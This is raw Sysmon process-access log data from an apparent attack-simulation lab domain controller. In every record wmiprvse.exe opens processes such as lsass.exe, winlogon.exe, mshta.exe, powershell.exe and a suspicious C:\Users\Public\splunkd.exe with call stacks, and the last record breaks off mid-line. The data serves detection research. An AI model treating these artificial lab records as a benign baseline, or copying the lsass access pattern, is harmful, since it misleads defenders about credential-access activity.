15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025150Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025149Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025148Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025147Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025146Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025145Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025144Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025143Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025142Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025141Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025140Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025139Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025138Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025137Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025136Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025135Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025134Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535F-6008-5506-00000000A301}3288C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025133Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025132Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025131Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 